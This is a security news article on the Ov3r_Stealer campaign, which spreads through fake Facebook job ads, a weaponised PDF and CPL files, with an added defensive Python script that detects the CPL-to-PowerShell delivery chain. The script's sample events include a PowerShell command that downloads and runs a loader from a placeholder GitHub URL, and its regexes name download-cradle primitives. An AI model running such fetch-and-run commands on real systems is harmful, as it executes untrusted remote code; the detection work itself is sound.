Ov3r_Stealer Malware Spreads Fake Facebook Job Ads to Steal Personal Data
Threat actors have devised a cunning scheme involving fake job ads on Facebook, using them as a gateway to deploy a newly discovered Windows-based stealer malware known as Ov3r_Stealer.
Deceptive Tactics Unveiled
The campaign begins with enticing job offers, purportedly from reputable companies, that lure unsuspecting individuals. The ads lead to a weaponized PDF file, passed off as a legitimate document hosted on OneDrive, which carries an embedded link the victim is prompted to click.
Unveiling the Malicious Payload
Once the victim clicks on the link, they are directed to a Discord content delivery network (CDN), where an internet shortcut file (.URL) is served. Disguised as a DocuSign document, this shortcut file acts as a conduit for delivering a control panel item (.CPL) file.
The Unfolding of the Attack
Upon execution, the CPL file retrieves a PowerShell loader from a GitHub repository, and that loader in turn launches Ov3r_Stealer. The malware is built to steal a broad range of sensitive information from the victim's system.
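The delivery chain described above (shortcut file, control panel item executed from a user-writable folder, PowerShell loader fetched from GitHub) leaves a recognisable process lineage on the endpoint. The following script is an added example, not code from the article or from any analysis of Ov3r_Stealer: it replays that chain against constructed process-creation events and flags each stage, so a defender can see what a detection for this kind of chain keys on. The event fields, file names, user name, pids and the GitHub URL are all constructed for this example.

```python
# Added example (not from the article): flag the CPL -> PowerShell delivery
# chain in constructed Windows process-creation events.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the process executable
    cmdline: str       # command line as logged
    parent_image: str


# Constructed sample events: a control panel item run from Downloads via
# control.exe/rundll32, then PowerShell pulling a loader from a raw GitHub URL.
# One benign event (notepad) is included so the rules have something to ignore.
SAMPLE_EVENTS = [
    ProcEvent(100, 10, r"C:\Windows\explorer.exe", r'"C:\Windows\explorer.exe"',
              r"C:\Windows\System32\userinit.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\control.exe",
              r'"C:\Windows\System32\control.exe" C:\Users\alice\Downloads\DocuSign_invoice.cpl',
              r"C:\Windows\explorer.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\alice\Downloads\DocuSign_invoice.cpl',
              r"C:\Windows\System32\control.exe"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -c "iwr https://raw.githubusercontent.com/example-org/example-repo/main/loader.ps1 | iex"',
              r"C:\Windows\System32\rundll32.exe"),
    ProcEvent(500, 100, r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\alice\notes.txt", r"C:\Windows\explorer.exe"),
]

# Locations a standard user can write to; a .cpl loaded from here is suspicious.
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\(users|programdata|temp)\\")
# A drive-rooted path ending in .cpl somewhere on the command line.
CPL_ARG = re.compile(r"(?i)\b([a-z]:\\[^\s\"]+\.cpl)\b")
# Common PowerShell download-and-run primitives.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(\biwr\b|invoke-webrequest|downloadstring|downloadfile|net\.webclient|"
    r"start-bitstransfer|\biex\b|invoke-expression)")


def cpl_from_user_path(ev):
    """Return the .cpl path if this event loads a control panel item from a
    user-writable location via control.exe or rundll32, else None."""
    if not ev.image.lower().endswith(("\\control.exe", "\\rundll32.exe")):
        return None
    m = CPL_ARG.search(ev.cmdline)
    if m and USER_WRITABLE.match(m.group(1)):
        return m.group(1)
    return None


def ancestors(ev, by_pid):
    """Walk the parent chain by pid/ppid; stops at an unknown parent or a cycle."""
    chain, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def find_cpl_powershell_chain(events):
    """Return one finding per suspicious stage: a .cpl loaded from a
    user-writable path, and a PowerShell download cradle descended from it."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        cpl = cpl_from_user_path(ev)
        if cpl:
            findings.append({"stage": "cpl_from_user_path", "pid": ev.pid, "cpl": cpl})
        if ev.image.lower().endswith("\\powershell.exe") and DOWNLOAD_CRADLE.search(ev.cmdline):
            for anc in ancestors(ev, by_pid):
                if cpl_from_user_path(anc):
                    findings.append({"stage": "powershell_cradle_under_cpl",
                                     "pid": ev.pid, "cpl_pid": anc.pid})
                    break
    return findings


if __name__ == "__main__":
    for f in find_cpl_powershell_chain(SAMPLE_EVENTS):
        print(f)
```

A control panel item loaded from a user profile directory is on its own only a weak signal; the stage that confirms the chain is a PowerShell process with a download cradle whose ancestry passes through that CPL load, which is why the second rule walks the parent chain rather than matching PowerShell command lines in isolation. In a real deployment the same two rules map directly onto Sysmon event ID 1 or EDR process-creation telemetry, with the parent/child relationship available from the logged ParentProcessId.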
Ov3r_Stealer’s Arsenal
Once running, Ov3r_Stealer collects a wide array of valuable data, including credentials, crypto wallets, IP addresses, hardware information, passwords, cookies, credit card details, browser extensions, and even a list of installed antivirus products, and exfiltrates it to the attackers.
The Potential Ramifications
While the exact intentions behind the campaign remain unclear, the stolen data could be sold on underground forums or used to facilitate further cyber attacks. Additionally, Ov3r_Stealer might evolve over time, potentially serving as a delivery mechanism for more destructive payloads like ransomware.
Vigilance and Defense
Given the stealthy nature of Ov3r_Stealer, prompt action is imperative for affected users. Employing robust anti-malware solutions can help detect and remove this threat, safeguarding systems from potential harm.